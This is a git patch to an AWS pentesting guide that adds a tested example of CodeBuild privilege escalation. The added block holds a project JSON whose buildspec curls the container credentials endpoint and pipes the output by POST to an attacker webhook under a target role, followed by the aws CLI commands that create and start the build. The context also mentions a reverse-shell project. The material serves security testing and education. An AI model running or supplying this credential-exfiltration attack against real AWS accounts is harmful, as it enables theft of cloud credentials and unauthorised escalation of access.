From 95f91529c7aa6926d7ca997e0d9cb0d474b8f42c Mon Sep 17 00:00:00 2001 From: Eva <44981946+ex16x41@users.noreply.github.com> Date: Wed, 8 Jan 2025 21:27:54 +0100 Subject: [PATCH] Update aws-codebuild-privesc.md Create a hook.json file with command to send output from curl credentials URI to your webhook address --- .../aws-codebuild-privesc.md | 36 +++++++++++++++++++ 1 file changed, 36 insertions(+) diff --git a/src/pentesting-cloud/aws-security/aws-privilege-escalation/aws-codebuild-privesc.md b/src/pentesting-cloud/aws-security/aws-privilege-escalation/aws-codebuild-privesc.md index c9b651a1c..d19a8f62f 100644 --- a/src/pentesting-cloud/aws-security/aws-privilege-escalation/aws-codebuild-privesc.md +++ b/src/pentesting-cloud/aws-security/aws-privilege-escalation/aws-codebuild-privesc.md @@ -142,6 +142,42 @@ aws codebuild start-build --project-name reverse-shell-project ``` +{{#endtab }} + +{{#tab name="Example3" }} + +```bash +# Generated by ex16x41, tested +# Create a hook.json file with command to send output from curl credentials URI to your webhook address + +{ + "name": "user-project-1", + "source": { + "type": "NO_SOURCE", + "buildspec": "version: 0.2\n\nphases:\n build:\n commands:\n - curl \"http://169.254.170.2$AWS_CONTAINER_CREDENTIALS_RELATIVE_URI\" | curl -X POST -d @- WEBHOOK URL\n" + }, + "artifacts": { + "type": "NO_ARTIFACTS" + }, + "environment": { + "type": "LINUX_CONTAINER", + "image": "public.ecr.aws/codebuild/amazonlinux2-x86_64-standard:4.0", + "computeType": "BUILD_GENERAL1_SMALL" + }, + "serviceRole": "ARN-OF-TARGET-ROLE" +} + +# Create a new CodeBuild project with the hook.json file +aws codebuild create-project --cli-input-json file:///tmp/hook.json + +# Start a build with the new project +aws codebuild start-build --project-name user-project-1 + +# Get Credentials output to webhook address +Wait a few seconds to maybe a couple minutes and view the POST request with data of credentials to pivot from + +``` + {{#endtab }} {{#endtabs }}